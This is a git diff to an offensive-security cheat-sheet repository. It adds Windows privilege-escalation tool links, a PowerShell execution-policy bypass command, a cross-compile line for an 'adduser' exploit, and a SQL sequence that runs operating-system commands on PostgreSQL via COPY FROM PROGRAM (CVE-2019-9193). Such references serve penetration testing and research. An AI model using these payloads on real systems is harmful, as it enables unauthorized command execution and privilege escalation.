diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 0dad93f562..08858de941 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -70,6 +70,11 @@ ``` * [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script) + + ```powershell + powershell.exe -ExecutionPolicy Bypass ./ADAPE.ps1 + ``` + * [Ping Castle](https://github.com/vletoux/pingcastle) ```powershell diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index e0d6f942f8..d73b0b8b1a 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -27,7 +27,8 @@ ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt ``` - [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check) -- [WindowsExploits - Windows exploits, mostly precompiled. Not being updated. ](https://github.com/abatchy17/WindowsExploits) +- [WindowsExploits - Windows exploits, mostly precompiled. Not being updated.](https://github.com/abatchy17/WindowsExploits) +- [WindowsEnumv - A Powershell Privilege Escalation Enumeration Script.](https://github.com/absolomb/WindowsEnum) - [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless) - [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit) ```powershell @@ -500,6 +501,12 @@ List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits](h ... - [MS03-026](./MS03-026)  [KB823980]   [Buffer Overrun In RPC Interface]  (/NT/2000/XP/2003) +To cross compile a program from Kali, use the following command. + +```powershell +Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c +``` + ## EoP - AlwaysInstallElevated Check if these registry values are set to "1". @@ -560,6 +567,7 @@ $ computer = "" ## References +* [Windows Internals Book - 02/07/2017](https://docs.microsoft.com/en-us/sysinternals/learn/windows-internals) * [icacls - Docs Microsoft](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls) * [Privilege Escalation Windows - Philip Linghammar](https://xapax.gitbooks.io/security/content/privilege_escalation_windows.html) * [Windows elevation of privileges - Guifre Ruiz](https://guif.re/windowseop) @@ -569,6 +577,7 @@ $ computer = "" * [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/) * [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/) * [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/) +* [Chapter 4 - Windows Post-Exploitation - 2 Nov 2017 - dostoevskylabs](https://github.com/dostoevskylabs/dostoevsky-pentest-notes/blob/master/chapter-4.md) * [Remediation for Microsoft Windows Unquoted Service Path Enumeration Vulnerability - September 18th, 2016 - Robert Russell](https://www.tecklyfe.com/remediation-microsoft-windows-unquoted-service-path-enumeration-vulnerability/) * [Pentestlab.blog - WPE-01 - Stored Credentials](https://pentestlab.blog/2017/04/19/stored-credentials/) * [Pentestlab.blog - WPE-02 - Windows Kernel](https://pentestlab.blog/2017/04/24/windows-kernel-exploits/) diff --git a/SQL Injection/Images/PostgreSQL_cmd_exec.png b/SQL Injection/Images/PostgreSQL_cmd_exec.png new file mode 100644 index 0000000000..c4bd219065 Binary files /dev/null and b/SQL Injection/Images/PostgreSQL_cmd_exec.png differ diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index 8eddd8af98..e8880db890 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -47,6 +47,21 @@ SELECT * FROM pentestlab; COPY pentestlab(t) TO '/tmp/pentestlab'; ``` +## PostgreSQL - Command execution + +CVE-2019–9193, can be used from [Metasploit](https://github.com/rapid7/metasploit-framework/pull/11598) if you have a direct access to the database, otherwise you need to execute manually the following SQL queries. + +```SQL +DROP TABLE IF EXISTS cmd_exec; -- [Optional] Drop the table you want to use if it already exists +CREATE TABLE cmd_exec(cmd_output text); -- Create the table you want to hold the command output +COPY cmd_exec FROM PROGRAM 'id'; -- Run the system command via the COPY FROM PROGRAM function +SELECT * FROM cmd_exec; -- [Optional] View the results +DROP TABLE IF EXISTS cmd_exec; -- [Optional] Remove the table +``` + +![https://cdn-images-1.medium.com/max/1000/1*xy5graLstJ0KysUCmPMLrw.png](https://cdn-images-1.medium.com/max/1000/1*xy5graLstJ0KysUCmPMLrw.png) + ## References -* [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9) \ No newline at end of file +* [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9) +* [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5) \ No newline at end of file